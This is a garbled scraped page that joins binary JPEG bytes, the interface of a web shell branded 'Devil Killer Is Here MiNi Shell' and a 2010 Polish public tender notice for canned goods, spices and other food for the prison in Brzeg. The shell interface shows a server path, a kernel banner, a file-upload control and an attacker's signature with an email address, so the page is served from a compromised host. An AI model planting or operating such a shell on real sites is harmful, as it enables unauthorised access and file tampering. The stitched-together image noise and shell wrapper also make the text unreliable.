JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100520/129615-N-2010.html

<p class="kh_header"><b>Brzeg: Zaopatrzenie Zakładu Karnego w Brzegu w konserwy,przyprawy i inne produkty żywnościowe .</b><br>
<b>Numer ogłoszenia: 129615 - 2010; data zamieszczenia: 20.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Chrobrego 29, 49-300 Brzeg, woj. opolskie, tel. 077 4162011, faks 077 4162287.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaopatrzenie Zakładu Karnego w Brzegu w konserwy,przyprawy i inne produkty żywnościowe ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zaopatrzenie Zakładu Karnego w Brzegu w konserwy,przyprawy i inne produkty żywnościowe  .
 
Część I  przetwory rybne

1.Szprot w pomidorach w opakowaniach 300 - 330 g w ilości   2 000 kg
2.Szprot w oleju w opakowaniach 300 - 330 g  w ilości    800 kg
3.Paprykarz szczeciński w opakowaniach 300 - 330 g w ilości   2 000 kg
4.Filet mrożony z pangi białej ( dop 20% glazury)w ilości   3 000 kg
5.Śledź matias lekko solony w wiadrach 5-10 kg w ilości   1 000 kg

Część II   konserwy i pasztety

1.Konserwa tyrolska w puszkach 300 g w  ilości   1 500 kg
2.Konserwa turystyczna  w puszkach 300 g w  ilości   1 500 kg
3.Pasztet drobiowy w puszkach  300 g w  ilości   2 000 kg
4.Pasztet drobiowy w opakowaniu aluminiowym  130 g  w  ilości  200 kg

Część III  przetwory warzywne

1.Sałatka wielowarzywna 0,9 l w ilości    1 500 kg
2.Sałatka szwedzka w słoikach 0,9l  w ilości    1 500 kg
3.Leczo warzywne pieczarkowe w opakowaniach do 4 kg  w ilości   600 kg

Część IV cukier

1.Cukier biały kryształ konfekcjonowany w opakowaniach 1 kg w ilości    11 000 kg

Część V mrożonki

1.Mieszanka warzyw mrożonych trzyskładnikowa (marchew,seler,pietruszka) w opak zbiorczych do 25 kg  w ilości    4 000 kg

Część VI soja

1.Soja kostka w opakowaniach   do 15 kg w ilości    150 kg
2.Soja krajanka w opakowaniach   do 15 kg w ilości    150 kg
3.Soja kotlet w opakowaniach   do 15 kg w ilości    150 kg

Część VII mąki i kasze

1.Kasza jęczmienna w opak. 1 kg w ilości     2 000 kg
2.Kasza manna w opak. 1 kg w ilości     1 800 kg
3.Ryż biały luzem w opak. 1 kg w ilości     5 000 kg
4.Mąka ziemniaczana w opakowaniach  1 kg w ilości     1 000 kg
5.Mąka pszenna typu 500 - 550 w opakowaniach 1 kg w ilości     4 000 kg
6.Płatki owsiane w opakowaniach odo 5  kg w ilości     1 300 kg
7.Makaron czterojajeczny typu (świderek, rurka) w opakowaniach do  15 kg  
w ilości  4 200 kg
8.Groch łuszczony w opakowaniach do 25 kg w ilości     1 000 kg
9.Fasola średniej wielkości  /jasiek /w opakowaniach do 25 kg w ilości     1 800 kg

Część VIII jaja

1.Jaja kurze klasy M w ilości   50 000 szt.

Część IX przyprawy

1.Kminek w opakowaniach zbiorczych od 6 g w ilości  3 kg
2.Ziele angielskie w opakowaniach 15 g w ilości   20 kg
3.Liść laurowy w opakowaniach do  1 kg w ilości  15 kg
4.Herbata ekspresowa w saszetkach (do 2 g) w ilości  2 000 szt.
5.Sól spożywcza drobnoziarnista w opakowaniach 1 kg w ilości  1 300 kg
6.Cynamon w opakowaniach do 5 g  w ilości   2 kg
7.Pieprz czarny mielony w opakowaniach zbiorczych do 1  kg w ilości   50 kg
8.Przyprawa w płynie typu maggi o poj..0,9- 1 l. w ilości   1 600 l.
9.Przyprawa jarzynowa mielona w opakowaniach do  5 kg w ilości   1 200 kg
10.Bulion warzywny w opakowaniu do 1 kg w ilości  900 kg
11.Majeranek suszony w opakowaniach  do 1 kg w ilości  15 kg
12.Koper suszony w opakowaniach do 1 kg w ilości   15 kg

Część  X inne

1.Koncentrat pomidorowy 30 % w słoikach 0,9 l. w ilości   1 500 kg
2.Groszek zielony konserwowy puszka 400 g w ilości   600 kg
3.Mleko w proszku pełnotłuste w workach do 20 kg w  ilości  1 800 kg
4.Kawa zbożowa w opakowaniach do 15 kg w ilości   1 200 kg
5.Dżem truskawkowy wiaderka 5-10 kg w ilości   5 000 kg
6.Żurek w proszku w opakowaniach do 5 kg w ilości  250 kg
7.Sos pieczeniowy w opakowaniach zbiorczych  do 1 kg w ilości  300 kg
8.Ocet 10% w butelkach 0,5 w ilości  250 l.

Wyżej wymienione  ilości zamawianych artykułów są ilościami maksymalnymi. Zamawiający zastrzega możliwość wykonania zamówienia w ilościach mniejszych niż maksymalne.

Zamawiający nie dopuszcza powierzenia przez Wykonawcę wykonania części lub całości zamówienia podwykonawcom.
Zamawiający dopuszcza składanie ofert częściowych . Oferta musi obejmować całość zamówienia  w danej części . Każda część  będzie rozpatrywana osobno..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2, 15.22.00.00-6, 15.12.30.00-3, 15.13.10.00-5, 15.13.13.00-8, 15.33.10.00-7, 01.12.10.00-1, 15.83.10.00-2, 15.33.11.70-9, 15.80.00.00-6, 15.61.31.00-9, 15.31.20.00-8, 15.61.21.00-2, 15.63.38.00-5, 15.85.11.10-2, 01.12.12.20-2, 01.12.12.10-6, 01.24.20.00-5, 15.87.00.00-7, 15.86.41.00-3, 15.87.24.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej 
Sposób oceny spełniania warunków
Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, opisanych w pkt. IX SIWZ. 
Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. 
Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Brzegu, 49-300 Brzeg, ul. Bolesława Chrobrego 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 10:00, miejsce: Sekretariat Zakładu Karnego w Brzegu, ul. Bolesława  Chrobrego 29, 49-300 Brzeg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> przetwory rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Szprot w pomidorach w opakowaniach 300 - 330 g w ilości   2 000 kg
2.Szprot w oleju w opakowaniach 300 - 330 g  w ilości      800 kg
3.Paprykarz szczeciński w opakowaniach 300 - 330 g w ilości   2 000 kg
4.Filet mrożony z pangi białej ( dop 20% glazury) w ilości   3 000 kg
5.Śledź matias lekko solony w wiadrach 5-10 kg w ilości   1 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2, 15.22.00.00-6, 15.12.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> konserwy i pasztety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Konserwa tyrolska w puszkach 300 g w  ilości   1 500 kg
2.Konserwa turystyczna  w puszkach 300 g w  ilości   1 500 kg
3.Pasztet drobiowy w puszkach  300 g w  ilości   2 000 kg
4.Pasztet drobiowy w opakowaniu aluminiowym  130 g  w  ilości      200 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.13.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> przetwory warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Sałatka wielowarzywna 0,9 l w ilości    1 500 kg
2.Sałatka szwedzka w słoikach 0,9l  w ilości    1 500 kg
3.Leczo warzywne pieczarkowe w opakowaniach do 4 kg  w ilości  600 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7, 01.12.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cukier biały kryształ konfekcjonowany w opakowaniach 1 kg w ilości    11 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Mieszanka warzyw mrożonych trzyskładnikowa (marchew,seler,pietruszka) w opak zbiorczych do 25 kg w ilości    4 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> soja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Soja kostka w opakowaniach   do 15 kg w ilości    150 kg
2.Soja krajanka w opakowaniach   do 15 kg w ilości    150 kg
3.Soja kotlet w opakowaniach   do 15 kg w ilości    150 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> mąki i kasze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kasza jęczmienna w opak. 1 kg w ilości  2 000 kg
2.Kasza manna w opak. 1 kg w ilości  1 800 kg
3.Ryż biały luzem w opak. 1 kg  w ilości   5 000 kg
4.Mąka ziemniaczana w opakowaniach  1 kg w ilości   1 000 kg
5.Mąka pszenna typu 500 - 550 w opakowaniach 1 kg w ilości    4 000 kg
6.Płatki owsiane w opakowaniach odo 5  kg w ilości  1 300 kg
7.Makaron czterojajeczny typu (świderek, rurka) w opakowaniach do  15 kg w ilości  4 200 kg
8.Groch łuszczony w opakowaniach do 25 kg w ilości  1 000 kg
9.Fasola średniej wielkości jasiek w opakowaniach do 25 kg w ilości  1 800 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.31.00-9, 15.31.20.00-8, 15.61.21.00-2, 15.63.38.00-5, 15.85.11.10-2, 01.12.12.20-2, 01.12.12.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jaja kurze klasy M  w ilości   50 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.24.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kminek w opakowaniach zbiorczych od 6 g w ilości      3 kg
2.Ziele angielskie w opakowaniach 15 g     w ilości       20 kg
3.Liść laurowy w opakowaniach do  1 kg    w ilości     15 kg
4.Herbata ekspresowa w saszetkach (do 2 g) w ilości  2 000 szt.
5.Sól spożywcza drobnoziarnista w opakowaniach 1 kg w ilości  1 300 kg
6.Cynamon w opakowaniach do 5 g   w ilości   2 kg
7.Pieprz czarny mielony w opakowaniach zbiorczych do 1  kg w ilości   50 kg
8.Przyprawa w płynie typu maggi o poj..0,9- 1 l. w ilości   1 600 l.
9.Przyprawa jarzynowa mielona w opakowaniach do  5 kg w ilości   1 200 kg
10.Bulion warzywny w opakowaniu do 1 kg w ilości      900 kg
11.Majeranek suszony w opakowaniach  do 1 kg w ilości  15 kg
12.Koper suszony w opakowaniach do 1 kg w ilości        15 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.86.41.00-3, 15.87.24.00-5, 15.87.00.00-7, 15.87.21.00-2, 15.87.10.00-4, 15.89.15.00-5, 15.87.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Koncentrat pomidorowy 30 % w słoikach 0,9 l. w ilości    1 500 kg
2.Groszek zielony konserwowy puszka 400 g w ilości       600 kg
3.Mleko w proszku pełnotłuste w workach do 20 kg w ilości    1 800 kg
4.Kawa zbożowa w opakowaniach do 15 kg w ilości    1 200 kg
5.Dżem truskawkowy wiaderka 5-10 kg w ilości   5 000 kg
6.Żurek w proszku w opakowaniach do 5 kg w ilości      250 kg
7.Sos pieczeniowy w opakowaniach zbiorczych  do 1 kg w ilości      300 kg
8.Ocet 10% w butelkach 0,5 w ilości      250 l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.34-5, 15.33.14.62-3, 15.51.17.00-0, 15.86.10.00-1, 15.33.22.96-5, 15.89.14.00-4, 15.87.12.60-4, 15.87.11.20-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com